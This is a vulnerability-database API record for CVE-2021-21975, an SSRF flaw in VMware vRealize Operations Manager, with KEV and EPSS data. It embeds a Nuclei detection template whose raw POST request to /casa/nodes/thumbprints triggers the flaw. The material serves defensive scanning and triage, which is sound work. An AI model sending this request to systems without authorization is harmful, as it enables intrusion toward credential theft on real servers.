{
  "_links": {
    "capec": {
      "href": "/api/v1/vulnerability/cve-2021-21975/capec"
    },
    "cvss": {
      "href": "/api/v1/vulnerability/cve-2021-21975/cvss"
    },
    "cwe": {
      "href": "/api/v1/vulnerability/cve-2021-21975/cwe"
    },
    "enrichment": {
      "href": "/api/v1/vulnerability/cve-2021-21975/enrichment"
    },
    "gcve": {
      "href": "/api/v1/vulnerability/cve-2021-21975/gcve"
    },
    "self": {
      "href": "/api/v1/vulnerability/cve-2021-21975"
    },
    "sightings": {
      "href": "/api/v1/sightings/cve-2021-21975"
    }
  },
  "enrichments": {
    "cisa-kev": {
      "kev": true
    },
    "epss": {
      "epss": 0.7829,
      "kev": true,
      "percentile": 0.99558
    },
    "nuclei": {
      "nuclei": true,
      "nuclei_template": "http/cves/2021/CVE-2021-21975.yaml",
      "nuclei_template_severity": "high",
      "nuclei_template_yaml": "id: CVE-2021-21975\n\ninfo:\n  name: vRealize Operations Manager API - Server-Side Request Forgery\n  author: luci\n  severity: high\n  description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.\n  impact: |\n    Successful exploitation of this vulnerability could allow an attacker to send arbitrary requests from the vulnerable server, potentially leading to unauthorized access, data leakage, or further attacks.\n  remediation: |\n    Apply the necessary security patches or updates provided by the vendor to mitigate this vulnerability.\n  reference:\n    - https://www.vmware.com/security/advisories/VMSA-2021-0004.html\n    - http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html\n    - https://nvd.nist.gov/vuln/detail/CVE-2021-21975\n  classification:\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N\n    cvss-score: 7.5\n    cve-id: CVE-2021-21975\n    cwe-id: CWE-918\n    epss-score: 0.7829\n    epss-percentile: 0.99558\n    cpe: cpe:2.3:a:vmware:cloud_foundation:3.0:*:*:*:*:*:*:*\n  metadata:\n    max-request: 1\n    vendor: vmware\n    product: cloud_foundation\n  tags: cve2021,cve,kev,packetstorm,ssrf,vmware,vrealize,vkev,vuln\n\nhttp:\n  - raw:\n      - |\n        POST /casa/nodes/thumbprints HTTP/1.1\n        Host: {{Hostname}}\n        Content-Type: application/json;charset=UTF-8\n\n        [\"127.0.0.1:443/ui/\"]\n\n    matchers-condition: and\n    matchers:\n      - type: word\n        part: body\n        words:\n          - 'vRealize Operations Manager'\n          - 'thumbprint'\n          - 'address'\n        condition: and\n\n      - type: status\n        status:\n          - 200\n# digest: 4a0a004730450220345c0c68b0dbe9433a78d50384968542acc5fe7ee8de0c67e5853580af3dc9ef0221009eb7dc547086b6b5f1f7c2ece5474adfcf4a9e82fa047b61de5b455df28b1823:922c64590222798bb761d5b6d8e72950"
    }
  },
  "vuln_id": "cve-2021-21975"
}